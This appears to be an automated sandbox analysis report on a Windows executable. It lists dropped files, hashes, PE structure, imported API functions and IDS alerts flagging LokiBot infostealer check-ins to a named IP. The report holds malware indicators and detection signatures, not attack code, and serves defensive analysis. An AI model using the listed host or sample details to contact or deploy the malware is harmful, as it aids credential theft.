Preview:	...2VAJQOTAD..UA.QKTAD42.AJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKT.D42[^._K.H...T..p.<(7.B'.-#9a'U\;.>q)1a6A\u($q...dY]1$d\F^eD42UAJQ..9...C...]..."......W.......]...-...\.vf..C...]..."......W.B..].......\.vf...C.wc...."..()9..W.42UAJQKT..42.@NQ.\-.42UAJQKT.D73^@FQKl@D4.]AJQKT.}52UQJQK.@D42.AJAKTAF42PAKQKTAD12TAJQKTAd>2UEJQKTAD62U.JQ[TAT42UAZQKDAD42UAZQKTAD42UAJQ..@DP2UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJ.JT.D42UAJQKTAD42UAJQKTAD42UAJQe $<@2UA.gJTAT42UyKQKPAD42UAJQKTAD42uAJ1e&%%@SUA.KTA.52U.JQKh@D42UAJQKTAD42.AJ.e0 0U2UAn.CTA.52UCJQK*@D42UAJQKTAD42.AJ.e,AD42UAJqKTAD>2UaJQK.@D42UAJQKTAD42UAJ.KTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKTAD42UAJQKT

C:\Users\user\AppData\Local\Temp\aut4D08.tmp

Download File

Process:	C:\Users\user\Desktop\dfiCWCanbj.exe
File Type:	data
Category:	dropped
Size (bytes):	75686
Entropy (8bit):	7.893824227507729
Encrypted:	false
SSDEEP:	1536:1i18EJuECHGQZBqjuzC0NEkYdNLh01pJ+wnKD3S5bYf:dEcEEGQ6jK2dNLulnKTukf
MD5:	4358730B3E7091B729C1F889C23C40CD
SHA1:	9943DF898F0130B48417B8DC7E79FC9C0AF2789F
SHA-256:	68FAE7E1E7B7B84B0923D1280EB4149408F53F0041D24C002CAAD04C18EA10F8
SHA-512:	9FF0D0D4A51811759A92B9110A76F15BE084ED36BF0D73393FA82E16D2032F267588FFEA2D167DDDBDDDBA3BF4868B26EF831C69B8FD5580837BB2945823DDAE
Malicious:	false
Reputation:	low
Preview:	EA06.....G.....Q..(4N_6.A.Ti`.D.e......U...6 .En......LW.T......o..I.....sa..k..t..)..f....Q$...q+%f.1.Y+.j....8\|..u..P../.w...H..L.....U.7..{....9.In......m..~.Q.h.E..(.......(p2...0...zx..........<.S9.......f.(...Q.W%.0.Mhh.y.z.F....$.!]......Q.. ....P@>.4.eP...A).....$.eU...bm2..iU..R.T.ZkU.]......n..T.%@.S.....`4..t....$....Q...(1y.......J..d.Y-..U.. ..P.........G...Dl.....([..:....PP...P.G.....3q..@K......P\|y......+...Am.^F..9.b. ..&.A..&.O..<a.....,..(...^.J.l..f2h.xd..N..)O..h@....4..`3z....\|4..D...P+ ....&uZ...Z...F..=Q@..6........T...H.......`..4.{W ...=.X..I..........NN..x...X..G.(.n6.J...T.L...]$..\|.t.<...ovtP...(..&...f.Q..)\..+..viYj-.....yT... .pz..3.{...........R@U......-9H....UiuM..S..T@......<@q.....<..8`...v...j.<'+..b{P....`.Tb..5.E..7:......A.2./[sK.n....'...m{.j..mg...:h.q1..2\|.?@."....V.@.L.x:\......&....,4\.A.I@!.........#...._......f.\|....,...T....A...............a.A]..+o..O........:..F.5.-3.o+.$.28}...1t..+...o.

C:\Users\user\AppData\Local\Temp\aut4D67.tmp

Download File

Process:	C:\Users\user\Desktop\dfiCWCanbj.exe
File Type:	data
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	7.6066355191858825
Encrypted:	false
SSDEEP:	192:cS6VV4FuBXLe2dvQiNzBxovvFSCgm/aKsTpYT4YmWlpfT5oKtS:cBVVPB62ZNd+FSA/aLTShmepf1B4
MD5:	E74063B425BC83A53D6D5BAF4A148AFA
SHA1:	1DEE96F9423A4E7397A32037260203F48BC1E332
SHA-256:	FA8DD1A0E34B9B053CB3CB8B0EC9CB1DA1103770B3795DCA2BE8CC651B6C6BA4
SHA-512:	C383EF20BABF094503BD7F05205B9DD8AB97B0AB7267CC221CF9B60F69CDD8974E747FA56C48342269253EECF40BC54ADB53C450E171F8D0D75878DADD12DC3E
Malicious:	false
Reputation:	low
Preview:	EA06..p..[$2.e..w.In7{..I&.......Gv.H.....I".K%....Av.. .]....Y...K........\|.P.o..v........,.....-.]..p......5..&.Z.C-..6...o.D..]....`.g.-....p..]....N.............-..$@...r.%.....c ....Au.H.......F.3<..\@.6...H....d....x.B....BZ.....]d`0..n.K..F...\$.5_..@....$@5_..X.U....5_....U... 5_..H.U..d.5\..>2P..H.^.u.Z..C".z.G".....@......9 .G.`/Z.H.......jZ...e.F.u....$. ./.G,...d`G_T....... >_.......zC!....)`....`...................`.M..`... ...w...@....'. .].{>K...c.Hn....].@._..X.....>K.#G.v..3\|wy .G. .]..8_..Cw..i\|wy....w.h...P........#.HnR.....H.Wp;..,.Kd2p.L..7)`.f..+..fd.il..".K.....f..E...Y.$..3..5....H.......w.$....p.....2p....<d....,vJ........K@!+..'$.....,fG&....i.......r.&.X..c2+..Mr.Y.!...Gd.....,f.-...@. .##....c.p.....9<.X.h.s.....,vN......t.I@..h40......d....K$.....4..@.6.-..p..R...&...Rp.N.@.;!.`...-.H.....C,....c....\d..wx.....vD.........E....K.y6....p.c2... ..b.!....F ....B5w.I.........vF......d.{..Z...B2......;,.X...u.H........`..e.....2+...w...

C:\Users\user\AppData\Local\Temp\troopwise

Download File

Process:	C:\Users\user\Desktop\dfiCWCanbj.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.5772800681343635
Encrypted:	false
SSDEEP:	768:zt2mA9+Wj7DQ5RGv6pFOCg0plmI9CrqNt:uxHDKc03CrqNt
MD5:	C84AE24D69CFD971CAAED7A536565BE2
SHA1:	E69CF00B45461B3227B2AE142766C9E4176EB4FB
SHA-256:	C8D45F7276BC6C47F653D3D7B73F9BBA4FAC2CB2CBF849ED8479E81281FF420C
SHA-512:	4B440489CD0869B5CAA8A3B395576566EB88E6E8730FAEB2314289331C27C39B3C4C48CF58D3BED1EFE9AE70B7EF782360FD84535F172FA6CDC20D0D0E8489A3
Malicious:	false
Reputation:	low
Preview:	$l!!,vqw,%qwww$&$$$$!"!#v,"v$$$$$$"",- !, v-"!$$$$$$"",- p,"vu#&$$$$$$"",-!!,,v,"q$$$$$$"",- !,uv-"!$$$$$$"",- p,wvu"w$$$$$$"",-!!,qv,''$$$$$$"",- !-$v-'&$$$$$$"",- p-&vu&q$$$$$$"",-!!- v," $$$$$$"",- !-"v-"w$$$$$$"",- p-,vu"w$$$$$$"",-!!-u''w$"",- !-wv-"q$$$$$$"",-,p rrrrrrvu# $$$$$$"",--! "rrrrrrv," $$$$$$"",-,! ,rrrrrrv-"w$$$$$$"",-,p urrrrrrvu"w$$$$$$"",--! wrrrrrrv,&q$$$$$$"",-,! qrrrrrrv-" $$$$$$"",-,p!$rrrrrrvu"w$$$$$$"",--!!&rrrrrrv,"w$$$$$$"",-,!! rrrrrr''w-"",-,p!"rrrrrrvu#!$$$$$$"",-!!p$v,#'$$$$$$"",- !p&v-"!$$$$$$"",- pp vu#&$$$$$$"",-!!p"v,''$$$$$$"",- !p,v-'&$$$$$$"",- ppuvu&q$$$$$$"",-!!pwv," $$$$$$"",- !pqv-"w$$$$$$"",- pq$vu"w$$$$$$"",-!!q&''w$"",- !q v-"%$$$$$$"",-,p",rrrrrrvu" $$$$$$"",--!"urrrrrrv,#"$$$$$$"",-,!"wrrrrrrv-"%$$$$$$"",-,p"qrrrrrrvu#$$$$$$$"",--!#$rrrrrrv,"-$$$$$$"",-,!#&rrrrrrv-''$$$$$$"",-,p# rrrrrrvu'&$$$$$$"",--!#"rrrrrrv,&q$$$$$$"",-,!#,rrrrrrv-" $$$$$$"",-,p#urrrrrrvu"w$$$$$$"",--!#wrrrrrrv,"w$$$$$$"",-,!#qrrrrrr''w-"",- p,$vu#'$$$$$$"",-!!u$v,",

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	49
Entropy (8bit):	1.2701062923235522
Encrypted:	false
SSDEEP:	3:/l1PL3n:fPL3
MD5:	CD8FA61AD2906643348EEF98A988B873
SHA1:	0B10E2F323B5C73F3A6EA348633B62AE522DDF39
SHA-256:	49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
SHA-512:	1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.8298535435398495
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	dfiCWCanbj.exe
File size:	956'928 bytes
MD5:	62abc4447d8b6877cab7a721e0331450
SHA1:	0fb7673b2437afa906299a676caf4c2a177c4b89
SHA256:	e0c5db8ba3b32956b954091828136618e0130b148675dbb153c0b77b77e2d1d4
SHA512:	44ca11519e0c58d7000bbb081101094177812516a467b12268b1be7ae8a8e04dd284abee3464b2524c7ecb229aeb80096f8d7f367102f4b1fac1823221c3cb4a
SSDEEP:	24576:uu6J33O0c+JY5UZ+XC0kGso6Far3Vx3WY:gu0c++OCvkGs9FarFkY
TLSH:	8D15AD22B3DDC360CB669173BF69B7016EBF3C614630B95B2F880D7DA950162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67B42E61 [Tue Feb 18 06:53:21 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FE014FD6C6Ah
jmp 00007FE014FC9A34h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE014FC9BBAh
cmp edi, eax
jc 00007FE014FC9F1Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FE014FC9BB9h
rep movsb
jmp 00007FE014FC9ECCh
cmp ecx, 00000080h
jc 00007FE014FC9D84h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FE014FC9BC0h
bt dword ptr [004BE324h], 01h
jc 00007FE014FCA090h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FE014FC9D5Dh
test edi, 00000003h
jne 00007FE014FC9D6Eh
test esi, 00000003h
jne 00007FE014FC9D4Dh
bt edi, 02h
jnc 00007FE014FC9BBFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE014FC9BC3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE014FC9C15h
bt esi, 03h
jnc 00007FE014FC9C68h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x210f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe9000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x210f4	0x21200	c29d57fa786b593cc44b5102f9652694	False	0.8008549528301887	data	7.534968288481642	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe9000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x183bc	data			1.0004130566189804
RT_GROUP_ICON	0xe7b74	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xe7bec	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xe7c00	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xe7c14	0x14	data	English	Great Britain	1.25
RT_VERSION	0xe7c28	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xe7d04	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-20T15:06:30.081385+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49710	104.21.80.1	80	TCP
2025-02-20T15:06:30.081385+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49710	104.21.80.1	80	TCP
2025-02-20T15:06:30.081385+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49710	104.21.80.1	80	TCP
